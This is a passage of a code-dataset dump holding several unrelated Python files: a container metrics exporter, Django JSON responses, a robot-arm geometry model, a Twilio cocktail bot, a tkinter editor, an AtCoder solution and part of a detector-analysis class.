We have to\n # get network statistic by ourselves.\n lsof_result = network.lsof(pid)\n net_in, net_out = network.get_container_network_metrics(all_conns, lsof_result)\n if logger.isEnabledFor(logging.DEBUG):\n debug_info = utils.check_output(\"ps -o cmd fp {0} | tail -n 1\".format(pid), shell=True)\n\n logger.debug(\"pid %s with cmd `%s` has lsof result %s, in %d, out %d\",\n pid, debug_info, lsof_result, net_in, net_out)\n\n if pai_service_name is None:\n gpuIds, otherLabels = parse_from_labels(inspect_info[\"labels\"])\n otherLabels.update(inspect_info[\"env\"])\n\n for id in gpuIds:\n if gpu_infos:\n labels = copy.deepcopy(otherLabels)\n labels[\"minor_number\"] = id\n\n result.append(Metric(\"container_GPUPerc\", labels, gpu_infos[id][\"gpuUtil\"]))\n result.append(Metric(\"container_GPUMemPerc\", labels, gpu_infos[id][\"gpuMemUtil\"]))\n\n result.append(Metric(\"container_CPUPerc\", otherLabels, stats[\"CPUPerc\"]))\n result.append(Metric(\"container_MemUsage\", otherLabels, stats[\"MemUsage_Limit\"][\"usage\"]))\n result.append(Metric(\"container_MemLimit\", otherLabels, stats[\"MemUsage_Limit\"][\"limit\"]))\n result.append(Metric(\"container_NetIn\", otherLabels, net_in))\n result.append(Metric(\"container_NetOut\", otherLabels, net_out))\n result.append(Metric(\"container_BlockIn\", otherLabels, stats[\"BlockIO\"][\"in\"]))\n result.append(Metric(\"container_BlockOut\", otherLabels, stats[\"BlockIO\"][\"out\"]))\n result.append(Metric(\"container_MemPerc\", otherLabels, stats[\"MemPerc\"]))\n else:\n labels = {\"name\": pai_service_name}\n result.append(Metric(\"service_cpu_percent\", labels, stats[\"CPUPerc\"]))\n result.append(Metric(\"service_mem_usage_byte\", labels, stats[\"MemUsage_Limit\"][\"usage\"]))\n result.append(Metric(\"service_mem_limit_byte\", labels, stats[\"MemUsage_Limit\"][\"limit\"]))\n result.append(Metric(\"service_mem_usage_percent\", labels, stats[\"MemPerc\"]))\n result.append(Metric(\"service_net_in_byte\", labels, net_in))\n result.append(Metric(\"service_net_out_byte\", labels, net_out))\n result.append(Metric(\"service_block_in_byte\", labels, stats[\"BlockIO\"][\"in\"]))\n result.append(Metric(\"service_block_out_byte\", labels, stats[\"BlockIO\"][\"out\"]))\n\n return result\n\ndef main(argv):\n log_dir = argv[0]\n gpu_metrics_path = log_dir + \"/gpu_exporter.prom\"\n job_metrics_path = log_dir + \"/job_exporter.prom\"\n time_sleep_s = int(argv[1])\n\n iter = 0\n\n singleton = utils.Singleton(gpu_exporter.collect_gpu_info)\n\n while True:\n try:\n logger.info(\"job exporter running {0} iteration\".format(str(iter)))\n iter += 1\n gpu_infos = singleton.try_get()\n\n gpu_metrics = gpu_exporter.convert_gpu_info_to_metrics(gpu_infos)\n utils.export_metrics_to_file(gpu_metrics_path, gpu_metrics)\n\n all_conns = network.iftop()\n logger.debug(\"iftop result is %s\", all_conns)\n\n # join with docker stats metrics and docker inspect labels\n job_metrics = collect_job_metrics(gpu_infos, all_conns)\n utils.export_metrics_to_file(job_metrics_path, job_metrics)\n except Exception as e:\n logger.exception(\"exception in job exporter loop\")\n\n time.sleep(time_sleep_s)\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(format=\"%(asctime)s - %(levelname)s - %(filename)s:%(lineno)s - %(message)s\",\n level=logging.DEBUG)\n\n main(sys.argv[1:])\n","sub_path":"src/job-exporter/src/job_exporter.py","file_name":"job_exporter.py","file_ext":"py","file_size_in_byte":7173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} 
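job_exporter.py hands its Metric lists to utils.export_metrics_to_file, whose implementation is not part of this dump. A plausible minimal version targeting the Prometheus textfile-collector format, assuming Metric exposes name/labels/value as constructed above, and using an atomic rename so the scraper never sees a half-written file:

import os
import tempfile

def export_metrics_to_file(path, metrics):
    """Write metrics in Prometheus text exposition format, atomically replacing path."""
    fd, tmp = tempfile.mkstemp(dir=os.path.dirname(path) or ".")
    with os.fdopen(fd, "w") as f:
        for m in metrics or []:
            labels = ",".join('%s="%s"' % kv for kv in sorted(m.labels.items()))
            f.write("%s{%s} %s\n" % (m.name, labels, m.value))
    os.rename(tmp, path)  # atomic on POSIX when tmp and path share a filesystem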
+{"seq_id":"525331214","text":"import requests\nimport json\nfrom cklib.logging import log\nfrom cklib.args import ArgumentParser\nfrom cklib.graph import Graph, sanitize\nfrom cklib.graph.export import node_from_dict\nfrom cklib.jwt import encode_jwt_to_headers\nfrom cklib.cleaner import Cleaner\n\n\ndef cleanup():\n \"\"\"Run resource cleanup\"\"\"\n\n def process_data_line(data: dict, graph: Graph):\n \"\"\"Process a single line of ckcore graph data\"\"\"\n\n if data.get(\"type\") == \"node\":\n node_id = data.get(\"id\")\n node = node_from_dict(data)\n node_mapping[node_id] = node\n log.debug(f\"Adding node {node} to the graph\")\n graph.add_node(node)\n if node.kind == \"graph_root\":\n log.debug(f\"Setting graph root {node}\")\n graph.root = node\n elif data.get(\"type\") == \"edge\":\n node_from = data.get(\"from\")\n node_to = data.get(\"to\")\n if node_from not in node_mapping or node_to not in node_mapping:\n raise ValueError(f\"One of {node_from} -> {node_to} unknown\")\n graph.add_edge(node_mapping[node_from], node_mapping[node_to])\n\n log.info(\"Running cleanup\")\n base_uri = ArgumentParser.args.ckcore_uri.strip(\"/\")\n ckcore_graph = ArgumentParser.args.ckcore_graph\n graph_uri = f\"{base_uri}/graph/{ckcore_graph}\"\n query_uri = f\"{graph_uri}/query/graph\"\n query_filter = \"\"\n if ArgumentParser.args.collector and len(ArgumentParser.args.collector) > 0:\n clouds = '[\"' + '\", \"'.join(ArgumentParser.args.collector) + '\"]'\n query_filter = f\"and metadata.ancestors.cloud.id in {clouds} \"\n query = f\"desired.clean == true {query_filter}<-[0:]->\"\n log.debug(f\"Sending query {query}\")\n\n headers = {\"accept\": \"application/x-ndjson\"}\n if getattr(ArgumentParser.args, \"psk\", None):\n encode_jwt_to_headers(headers, {}, ArgumentParser.args.psk)\n\n r = requests.post(query_uri, data=query, headers=headers, stream=True)\n if r.status_code != 200:\n log.error(r.content)\n raise RuntimeError(f\"Failed to query graph: {r.content}\")\n graph = Graph()\n node_mapping = {}\n\n for line in r.iter_lines():\n if not line:\n continue\n data = json.loads(line.decode(\"utf-8\"))\n try:\n process_data_line(data, graph)\n except ValueError as e:\n log.error(e)\n continue\n sanitize(graph)\n cleaner = Cleaner(graph)\n cleaner.cleanup()\n\n\ndef add_args(arg_parser: ArgumentParser) -> None:\n Cleaner.add_args(arg_parser)\n","sub_path":"ckworker/ckworker/cleanup.py","file_name":"cleanup.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"253222314","text":"import sys\nimport traceback\n\nfrom django import http\nfrom django.conf import settings\nfrom django.utils.translation import gettext as _\n\nfrom .settings import api_settings\n\n__all__ = [\n \"JSONResponse\",\n \"StreamingJSONResponse\",\n \"JSONErrorResponse\",\n \"Http200\",\n \"Http201\",\n \"Http204\",\n \"Http400\",\n \"Http401\",\n \"Http403\",\n \"Http404\",\n \"Http405\",\n \"Http409\",\n \"Http500\",\n]\n\nHTTP_HEADER_ENCODING = \"iso-8859-1\"\n\n\nclass JSONResponse(http.HttpResponse):\n \"\"\"An HTTP response class that consumes data to be serialized to JSON.\"\"\"\n\n def __init__(self, data, **kwargs):\n kwargs.setdefault(\"content_type\", \"application/json\")\n data = api_settings.JSON_ENCODER().encode(data).encode(\"utf-8\")\n super().__init__(content=data, **kwargs)\n\n\nclass StreamingJSONResponse(http.StreamingHttpResponse):\n def __init__(self, data, **kwargs):\n kwargs.setdefault(\"content_type\", 
\"application/json\")\n data = api_settings.JSON_ENCODER().iterencode(data)\n super().__init__(streaming_content=data, **kwargs)\n\n\nclass JSONErrorResponse(JSONResponse):\n \"\"\"A JSON response class for simple API errors.\"\"\"\n\n default_reason = None\n status_code = 500\n\n def __init__(self, reason=None, **kwargs):\n data = reason or self.default_reason\n if data is None or isinstance(data, str):\n data = {\"errors\": {\"detail\": [{\"message\": reason or self.default_reason}],}}\n\n if settings.DEBUG:\n exc = sys.exc_info()\n if exc[0] is not None:\n data[\"meta\"] = {\"traceback\": \"\".join(traceback.format_exception(*exc))}\n super().__init__(data, **kwargs)\n\n\nclass Http200(JSONResponse):\n \"\"\"HTTP 200 OK\"\"\"\n\n pass\n\n\nclass Http201(JSONResponse):\n \"\"\"HTTP 201 Created\"\"\"\n\n status_code = 201\n\n\nclass Http204(http.HttpResponse):\n \"\"\"HTTP 204 No Content\"\"\"\n\n status_code = 204\n\n\nclass Http400(JSONErrorResponse):\n \"\"\"HTTP 400 Bad Request\"\"\"\n\n status_code = 400\n\n\nclass Http401(JSONErrorResponse):\n \"\"\"HTTP 401 Unauthorized\"\"\"\n\n status_code = 401\n\n\nclass Http403(JSONErrorResponse):\n \"\"\"HTTP 403 Forbidden\"\"\"\n\n status_code = 403\n\n\nclass Http404(JSONErrorResponse):\n \"\"\"HTTP 404 Not Found\"\"\"\n\n status_code = 404\n\n\nclass Http405(JSONResponse):\n \"\"\"HTTP 405 Method Not Allowed\"\"\"\n\n status_code = 405\n\n def __init__(self, method, permitted_methods, *args, **kwargs):\n data = {\n \"errors\": {\n \"detail\": [{\"message\": _('Method \"{0}\" not allowed').format(method)}],\n }\n }\n super().__init__(data=data, *args, **kwargs)\n self[\"Allow\"] = \", \".join(permitted_methods)\n\n\nclass Http409(JSONErrorResponse):\n \"\"\"HTTP 409 Conflict\"\"\"\n\n status_code = 409\n\n\nclass Http500(JSONErrorResponse):\n \"\"\"HTTP 500 Internal Server Error\"\"\"\n\n pass\n","sub_path":"resticus/http.py","file_name":"http.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"180706669","text":"import math\nfrom math import pi\n\n\ndef cos(theta):\n return math.cos(theta / 180 * pi)\n\n\ndef sin(theta):\n return math.sin(theta / 180 * pi)\n\n\ndef PointInNewCoor(PointFixed, Coordinate, Origin):\n PointNew = [0, 0, 0]\n for i in range(3):\n PointNew[i] = sum(list(map(lambda p, v: p * v[i], PointFixed, Coordinate)))\n return list(map(lambda p, o: p + o, PointNew, Origin))\n\n\ndef GenBoxFromFourPoints(FourPoints):\n Box = []\n Ps = {}\n Ps[0], Ps[1], Ps[2], Ps[4] = FourPoints\n Ps[3] = list(map(lambda p0, p1, p2: p2 + p0 - p1, Ps[0], Ps[1], Ps[2]))\n for i in range(5, 8):\n Ps[i] = list(map(lambda pi_4, p0, p4: pi_4 + p4 - p0, Ps[i - 4], Ps[0], Ps[4]))\n for i in range(8):\n Box.append(Ps[i])\n return Box\n\n\ndef UpdateCoordinate(Part):\n if Part.Type == \"Base\":\n return\n if Part.Type == \"ArmLvl\":\n Part.Origin = Part.Pre.End\n Now=Part\n while (1):\n Now=Now.Pre\n if Now.Type==\"TurnTable\":\n break\n Part.Coordinate=Now.Coordinate\n else:\n if Part.Axe == \"z\":\n Part.Origin = Part.Pre.End\n Part.Coordinate = Part.Pre.Coordinate\n i_Pre, j_Pre, k_Pre = Part.Coordinate\n k_Turned = k_Pre\n i_Turned = list(map(lambda i, j: i * cos(Part.TurnedAngle) + j * sin(Part.TurnedAngle), i_Pre, j_Pre))\n j_Turned = list(map(lambda i, j: -i * sin(Part.TurnedAngle) + j * cos(Part.TurnedAngle), i_Pre, j_Pre))\n Part.Coordinate = [i_Turned, j_Turned, k_Turned]\n elif Part.Axe == \"y\":\n Part.Origin = Part.Pre.End\n Part.Coordinate = 
Part.Pre.Coordinate\n i_Pre, j_Pre, k_Pre = Part.Coordinate\n j_Turned = j_Pre\n i_Turned = list(map(lambda i, k: -k * sin(Part.TurnedAngle) + i * cos(Part.TurnedAngle), i_Pre, k_Pre))\n k_Turned = list(map(lambda i, k: k * cos(Part.TurnedAngle) + i * sin(Part.TurnedAngle), i_Pre, k_Pre))\n Part.Coordinate = [i_Turned, j_Turned, k_Turned]\n return\n\n\ndef UpdateBox(Part):\n Part.BoxFixed = GenBoxFromFourPoints(Part.FourPoints)\n Part.Box = deepcopy(Part.BoxFixed)\n for i in range(8):\n Part.Box[i] = PointInNewCoor(Part.BoxFixed[i], Part.Coordinate, Part.Origin)\n return\n\n\ndef UpdatePart(Part):\n UpdateCoordinate(Part)\n Part.End = PointInNewCoor(Part.ConnectPoint, Part.Coordinate, Part.Origin)\n UpdateBox(Part)\n if Part.Next is not None:\n UpdatePart(Part.Next)\n else:\n return\n\n\nfrom copy import deepcopy\n\n\nclass Base:\n def __init__(self, Name):\n self.Name = Name\n self.Type = \"Base\"\n\n self.Origin = [0, 0, 0]\n self.Coordinate = [[1, 0, 0], [0, 1, 0], [0, 0, 1]] # i,j,k vector of coordinate system\n\n self.FourPoints = [[62.5,-67,70] , [-62.5,-67,70],[-62.5,67,70], [62.5,-67,0]] # I II III V Octant.These four points are under self-fixed coordinate.\n self.BoxFixed = GenBoxFromFourPoints(self.FourPoints)\n self.Box = deepcopy(self.BoxFixed)\n\n self.End = [0, 0, 70]\n\n self.Next = None\n\n\nclass TurnTable:\n def __init__(self, Name):\n self.Name = Name\n self.Type = \"TurnTable\"\n\n self.Origin = [0, 0, 0]\n self.Coordinate = [[1, 0, 0], [0, 1, 0], [0, 0, 1]]\n\n self.FourPoints = [[36, -71, 60], [36, 71, 60], [-36, 71, 60], [36, -71, 0]]\n self.BoxFixed = GenBoxFromFourPoints(self.FourPoints)\n self.Box = deepcopy(self.BoxFixed)\n\n self.ConnectPoint = [13.2, 0, 36.1]\n self.End = deepcopy(self.ConnectPoint)\n\n self.TurnedAngle = 0\n self.LimInterval = [-90, 90]\n self.Axe = \"z\"\n self.Speed=40\n\n self.Pre = None\n self.Next = None\n\n def Turn2Angle(self, Angle):\n self.TurnedAngle = Angle\n if self.TurnedAngle > self.LimInterval[1]:\n self.TurnedAngle = self.LimInterval[1]\n elif self.TurnedAngle < self.LimInterval[0]:\n self.TurnedAngle = self.LimInterval[0]\n UpdatePart(self)\n\n def TurnDeltaAngle(self, DeltaAngle):\n self.Turn2Angle(self.TurnedAngle + DeltaAngle)\n\n def ConnectPre(self, Pre):\n self.Pre = Pre\n self.Pre.Next = self\n UpdatePart(self)\n\n\nclass Arm:\n def __init__(self, Name, FourPoints,ConnectPoint):\n self.Name = Name\n self.Type = \"Arm\"\n\n self.Origin = [0, 0, 0]\n self.Coordinate = [[1, 0, 0], [0, 1, 0], [0, 0, 1]]\n\n self.FourPoints = FourPoints\n self.BoxFixed = GenBoxFromFourPoints(self.FourPoints)\n self.Box = deepcopy(self.BoxFixed)\n\n self.ConnectPoint = ConnectPoint\n self.End = deepcopy(self.ConnectPoint)\n\n self.TurnedAngle = 0\n self.LimInterval = [-90, 90]\n self.Axe = \"y\"\n self.Speed=40\n\n self.Pre = None\n self.Next = None\n\n def Turn2Angle(self, Angle):\n self.TurnedAngle = Angle\n if self.TurnedAngle > self.LimInterval[1]:\n self.TurnedAngle = self.LimInterval[1]\n elif self.TurnedAngle < self.LimInterval[0]:\n self.TurnedAngle = self.LimInterval[0]\n UpdatePart(self)\n\n def TurnDeltaAngle(self, DeltaAngle):\n self.Turn2Angle(self.TurnedAngle + DeltaAngle)\n\n def ConnectPre(self, Pre):\n self.Pre = Pre\n self.Pre.Next = self\n UpdatePart(self)\n\nclass ArmLvl:\n def __init__(self,Name,FourPoints,ConnectPoint):\n self.Name=Name\n self.Type=\"ArmLvl\"\n\n self.Origin = [0, 0, 0]\n self.Coordinate = [[1, 0, 0], [0, 1, 0], [0, 0, 1]]\n\n self.FourPoints = FourPoints\n self.BoxFixed = 
GenBoxFromFourPoints(self.FourPoints)\n self.Box = deepcopy(self.BoxFixed)\n\n self.ConnectPoint = ConnectPoint\n self.End = deepcopy(self.ConnectPoint)\n\n self.Pre = None\n self.Next = None\n\n def ConnectPre(self, Pre):\n self.Pre = Pre\n self.Pre.Next = self\n UpdatePart(self)\n\n\nclass Hand:\n def __init__(self, Name, FourPoints):\n self.Name = Name\n self.Type = \"Hand\"\n\n self.Origin = [0, 0, 0]\n self.Coordinate = [[1, 0, 0], [0, 1, 0], [0, 0, 1]]\n\n self.FourPoints = FourPoints\n self.BoxFixed = GenBoxFromFourPoints(self.FourPoints)\n self.Box = deepcopy(self.BoxFixed)\n\n self.ConnectPoint = [0,0,0]\n self.End = deepcopy(self.ConnectPoint)\n\n self.TurnedAngle = 0\n self.LimInterval = [-90, 90]\n self.Axe = \"z\"\n\n self.Pre = None\n self.Next = None\n\n def Turn2Angle(self, Angle):\n self.TurnedAngle = Angle\n if self.TurnedAngle > self.LimInterval[1]:\n self.TurnedAngle = self.LimInterval[1]\n elif self.TurnedAngle < self.LimInterval[0]:\n self.TurnedAngle = self.LimInterval[0]\n UpdatePart(self)\n\n def TurnDeltaAngle(self, DeltaAngle):\n self.Turn2Angle(self.TurnedAngle + DeltaAngle)\n\n def ConnectPre(self, Pre):\n self.Pre = Pre\n self.Pre.Next = self\n UpdatePart(self)\n\n","sub_path":"Common/Virtual-uArm/Code-Python/Structure.py","file_name":"Structure.py","file_ext":"py","file_size_in_byte":7038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"614444975","text":"from flask import Flask, request\nimport requests\nimport json\n\nfrom twilio.twiml.messaging_response import MessagingResponse\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef index():\n url = 'https://thecocktaildb.com/api/json/v1/1/random.php'\n r = requests.get(url)\n if r.status_code == 200:\n data = r.json()\n recipe = data[\"drinks\"]\n aname = [item[\"strDrink\"] for item in recipe]\n fname = [aname[0]]\n name = fname\n else:\n name = \"I could not retrieve your recipe\"\n return str(name)\n\n\n@app.route(\"/bot\", methods=[\"POST\"])\ndef bot():\n incoming_msg = request.values.get('Body', '').lower()\n resp = MessagingResponse()\n msg = resp.message()\n responded = False\n if 'drink' in incoming_msg:\n url = 'https://thecocktaildb.com/api/json/v1/1/random.php'\n r = requests.get(url)\n if r.status_code == 200:\n data = r.json()\n recipe = data[\"drinks\"]\n drink = [item[\"strDrink\"] for item in recipe]\n fname = f'{drink}'\n print(fname)\n msg.body(fname)\n responded = True\n if 'picture' in incoming_msg:\n msg.media('https://source.unsplash.com/random/400x400')\n responded = True\n if not responded:\n msg.body = \"I could not retrieve a drink from the db\"\n return str(resp)\n\n\nif __name__ == \"__main__\":\n app.run()\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"492531686","text":"from tkinter import *\nfrom tkinter import filedialog\n\ndef doNothing():\n x = 0\n\ndef createMainWindow():\n root = Tk()\n root.title(\"Coral Text Editor\")\n root.geometry();\n return root\n\n\ndef addTextWidget(mainWindow):\n text=Text(mainWindow)\n text.pack(fill=BOTH, expand=YES)\n return text\n\n\ndef addSaveButton(mainWindow):\n button = Button(mainWindow, text=\"Save\", command=saveAs)\n button.pack(side=RIGHT, padx=5, pady=5)\n\n\ndef addOpenButton(mainWindow):\n button = Button (mainWindow, text=\"Open\")\n button.grid()\n\n\ndef saveAs():\n global filePath\n t = text.get(\"1.0\", \"end-1c\")\n 
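# --- Editor's note: standalone illustrative sketch; not part of the dataset records around it. ---
# UpdateCoordinate in the Structure.py record above rotates the parent's
# (i, j, k) basis about the z axis, with angles in degrees:
# i' = i*cos(t) + j*sin(t), j' = -i*sin(t) + j*cos(t), k' = k.
# A minimal standalone version of that step (function name is mine):
import math

def rotate_basis_z(i, j, k, degrees):
    t = math.radians(degrees)
    i2 = [a * math.cos(t) + b * math.sin(t) for a, b in zip(i, j)]
    j2 = [-a * math.sin(t) + b * math.cos(t) for a, b in zip(i, j)]
    return i2, j2, list(k)

# Rotating the identity basis by 90 degrees sends i to j and j to -i:
i2, j2, k2 = rotate_basis_z([1, 0, 0], [0, 1, 0], [0, 0, 1], 90)
# i2 ~ [0, 1, 0], j2 ~ [-1, 0, 0], k2 == [0, 0, 1]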
savelocation = filedialog.asksaveasfilename()\n    file1 = open(savelocation, \"w+\")\n    file1.write(t)\n    file1.close()\n    filePath = savelocation\n\n\ndef save():\n    global filePath\n    t = text.get(\"1.0\", \"end-1c\")\n    file1 = open(filePath, \"w+\")\n\n    file1.write(t)\n    file1.close()\n\ndef setText(value):\n    text.delete(1.0, END)\n    text.insert(END, value)\n\ndef openFile():\n    global filePath\n    openlocation = filedialog.askopenfilename()\n    with open(openlocation) as f: \n        t = f.read()\n        setText(t)\n    filePath = openlocation\n\n\ndef addMenuBar(root):\n    menubar = Menu(root)\n    fileMenu = Menu(menubar, tearoff=0)\n    fileMenu.add_command(label=\"Open\", command=openFile)\n    fileMenu.add_command(label=\"Save as\", command=saveAs)\n    fileMenu.add_command(label=\"Save\", command=save)\n    fileMenu.add_command(label=\"Exit\", command=doNothing)\n    \n\n    settingsMenu = Menu(menubar, tearoff=0)\n    settingsMenu.add_command(label=\"Change color scheme\", command=doNothing)\n    \n    helpMenu = Menu(menubar, tearoff=0)\n\n    menubar.add_cascade(label=\"File\", menu=fileMenu)\n    menubar.add_cascade(label=\"Settings\", menu=settingsMenu)\n    menubar.add_cascade(label=\"Help\", menu=helpMenu)\n    return menubar\n\ndef main():\n    global text, filePath\n    mainWindow = createMainWindow();\n    text = addTextWidget(mainWindow)\n\n    menubar = addMenuBar(mainWindow)\n    \n    mainWindow.config(menu=menubar)\n    mainWindow.mainloop()\n\n    \nif __name__ == '__main__':\n    main()\n","sub_path":"coral.py","file_name":"coral.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"214964186","text":"\n\"\"\"\nhttps://atcoder.jp/contests/abc168/tasks/abc168_e\n\nCount the number of ways to choose elements so that no chosen pair (i, j)\nsatisfies A[i]*A[j] + B[i]*B[j] = 0.\n\nThe forbidden condition arises in the following cases:\na=b=0: such an element can only be chosen on its own.\na=0,b!=0 or a!=0,b=0: a pair of these two kinds of elements satisfies the\n    condition. The value of the nonzero entry does not matter, so normalize it to 1.\na!=0,b!=0: constant multiples do not matter, so divide both a and b by their GCD.\n\nFrom the above, the conflicting pairs are the (a, b) and (b, a) groups whose\nproducts have opposite signs. Here, a!=0 with a*b>=0 is classified as (a, b),\nand everything else as (b, a).\n\nWhen counting, each group p contributes 2^d[p][0] + 2^d[p][1] - 1 choices:\neach element on the (a, b) side is in or out, each element on the (b, a) side\nis in or out, and the -1 removes the case where none of them is chosen.\n\"\"\"\n\nfrom math import gcd\n\nN = int(input())\nX = [list(map(int, input().split())) for _ in range(N)]\n\nd = {}\nfor a, b in X:\n    if a == b == 0:\n        pass\n    elif a == 0:\n        b = 1\n    elif b == 0:\n        a = 1\n    else:\n        v = gcd(a, b)\n        a //= v\n        b //= v\n\n    if a != 0 and a * b >= 0:\n        pair = (abs(a), abs(b))\n        if pair not in d:\n            d[pair] = [0, 0]\n        d[pair][0] += 1\n    else:\n        pair = (abs(b), abs(a))\n        if pair not in d:\n            d[pair] = [0, 0]\n        d[pair][1] += 1\n\nMOD = 10 ** 9 + 7\nzero = 0\nans = 1\nfor p in d:\n    if p == (0, 0):\n        zero = d[p][1]\n    else:\n        a, b = d[p]\n        ans *= pow(2, a, MOD) + pow(2, b, MOD) - 1\n        ans %= MOD\n\nprint((ans + zero - 1) % MOD)\n","sub_path":"src/solutions/abc168_e.py","file_name":"abc168_e.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"50993444","text":"import abc\nimport os\n\nimport numpy as np\nimport pandas as pd\n\nfrom odin.utils import get_root_logger\nfrom odin.utils.draw_utils import make_multi_category_plot, display_sensitivity_impact_plot, \\\n    plot_categories_curve, plot_class_distribution\n\nlogger = get_root_logger()\n\n\nclass AnalyzerInterface(metaclass=abc.ABCMeta):\n\n    __detector_name = \"detector\"\n    result_saving_path = \"./results/\"\n\n    dataset = None\n\n    __valid_metrics = None\n    __valid_curves = None\n    metric = None\n\n    # 
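# --- Editor's note: standalone illustrative sketch; not part of the dataset records around it. ---
# The abc168_e record above counts, per normalized direction pair, the subsets
# that avoid mixing the two orthogonal sides: with x elements on one side and
# y on the other, there are 2**x + 2**y - 1 selections (including the empty
# one, counted once). A brute-force check of that identity (names are mine):
from itertools import combinations

def count_valid(x, y):
    return 2 ** x + 2 ** y - 1

def count_valid_brute(x, y):
    items = ["a"] * x + ["b"] * y
    total = 0
    for r in range(len(items) + 1):
        for chosen in combinations(range(len(items)), r):
            # valid iff the chosen subset does not contain both kinds
            total += {items[i] for i in chosen} != {"a", "b"}
    return total

assert count_valid(3, 2) == count_valid_brute(3, 2) == 11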
ONLY FOR TESTING, TO REMOVE\n use_new_normalization = True # if True use the new implementation of normalization (categories + properties),\n # otherwise use the old one (only categories)\n\n _use_normalization = False\n _norm_factors = None\n normalizer_factor = 1\n\n conf_thresh = 0.5\n\n saved_results = {}\n fp_errors = None\n\n __SAVE_PNG_GRAPHS = True\n\n __is_binary = False\n\n def __init__(self, detector_name, dataset, result_saving_path, use_normalization, norm_factor_categories,\n norm_factors_properties, conf_thresh, metric, valid_metrics, valid_curves, is_binary,\n save_graphs_as_png):\n\n self.__detector_name = detector_name\n self.dataset = dataset\n\n if not os.path.exists(result_saving_path):\n os.mkdir(result_saving_path)\n self.result_saving_path = os.path.join(result_saving_path, detector_name)\n if not os.path.exists(self.result_saving_path):\n os.mkdir(self.result_saving_path)\n\n self._use_normalization = use_normalization\n self._norm_factors = self.__create_norm_factors_dict(norm_factor_categories, norm_factors_properties)\n self.conf_thresh = conf_thresh\n self.metric = metric\n self.__valid_metrics = valid_metrics\n self.__valid_curves = valid_curves\n self.__is_binary = is_binary\n self.__SAVE_PNG_GRAPHS = save_graphs_as_png\n\n def analyze_property(self, property_name, possible_values=None, labels=None, show=True, metric=None):\n \"\"\"Analyzes the performances of the model for each category considering only the ground truth having a certain\n property value.\n\n Parameters\n ----------\n property_name: str\n Name of the property to analyze\n possible_values: list, optional\n Property values to be analyzed. If None consider all the possible values of the property. (default is None)\n labels: list, optional\n Property values names to show in the graph. If None use the display name in the properties file.\n (default is None)\n show: bool, optional\n If True results are shown in a graph. (default is True)\n metric: str, optional\n Metric used for the analysis. If None use the default metrics. 
(default is None)\n\n \"\"\"\n if property_name not in self.dataset.get_property_keys():\n logger.error(f\"Property '{property_name}' not valid\")\n return\n if possible_values is None or not possible_values:\n possible_values = self.dataset.get_values_for_property(property_name)\n else:\n if not self._is_valid_property(property_name, possible_values):\n return\n if labels is None:\n labels = []\n for p in possible_values:\n display_name = self.dataset.get_display_name_of_property_value(property_name, p)\n if display_name is None:\n labels.append(p)\n else:\n labels.append(display_name)\n elif len(possible_values) != len(labels):\n logger.error(\"Inconsistency between number of possible values and labels.\")\n return\n if metric is None:\n metric = self.metric\n elif not self._is_valid_metric(metric):\n return\n if metric not in self.saved_results.keys():\n self.saved_results[metric] = {}\n if self.__is_binary:\n categories = [self.dataset.get_categories_names()[0]]\n else:\n categories = self.dataset.get_categories_names()\n for category in categories:\n category_id = self.dataset.get_category_id_from_name(category)\n if category not in self.saved_results[metric].keys():\n self.saved_results[metric][category] = {}\n self.saved_results[metric][category]['all'] = self._calculate_metric_for_category(category,\n metric=metric)\n matching = self.saved_results[metric][category]['all'][\"matching\"]\n self.saved_results[metric][category][property_name] = self._calculate_metric_for_properties_of_category(\n category, category_id, property_name, possible_values, matching, metric=metric)\n\n title = \"Analysis of {} property\".format(property_name)\n\n if show:\n make_multi_category_plot(self.saved_results[metric], property_name, labels, title, metric,\n self.__SAVE_PNG_GRAPHS, self.result_saving_path)\n\n def analyze_properties(self, properties=None, metric=None):\n \"\"\"Analyzes the performances of the model for each category considering only the ground truth having a certain\n property value. The analysis is performed for all the properties specified in the parameters.\n\n Parameters\n ----------\n properties: list of str, optional\n Names of the properties to analyze. If None perform the analysis for all the properties. (default is None)\n metric: str\n Metric used for the analysis. If None use the default metrics. (default is None)\n \"\"\"\n if properties is None:\n properties = self.dataset.get_property_keys()\n else:\n if not self._are_valid_properties(properties):\n return\n if metric is None:\n metric = self.metric\n elif not self._is_valid_metric(metric):\n return\n for pkey in properties:\n values = self.dataset.get_values_for_property(pkey)\n self.analyze_property(pkey, values, metric=metric)\n\n def show_distribution_of_properties(self, properties=None):\n \"\"\"Shows the distribution of the property among its different values and for each property value shows the\n distribution among the categories.\n\n Parameters\n ----------\n properties: list of str, optional\n Names of the properties to analyze the distribution. 
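# --- Editor's note: standalone illustrative sketch; not part of the dataset record around it. ---
# The default normalization factors that __init__ above obtains from
# __create_norm_factors_dict (defined further down in this record) are simply
# 1 / (number of categories) and 1 / (number of values per property).
# The same computation in miniature (function name is mine):
def default_norm_factors(categories, properties):
    # properties: dict mapping property name -> list of possible values
    factors = {"categories": 1 / len(categories)}
    for name, values in properties.items():
        factors[name] = 1 / len(values)
    return factors

assert default_norm_factors(["cat", "dog"], {"size": ["s", "m", "l"]}) == \
    {"categories": 0.5, "size": 1 / 3}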
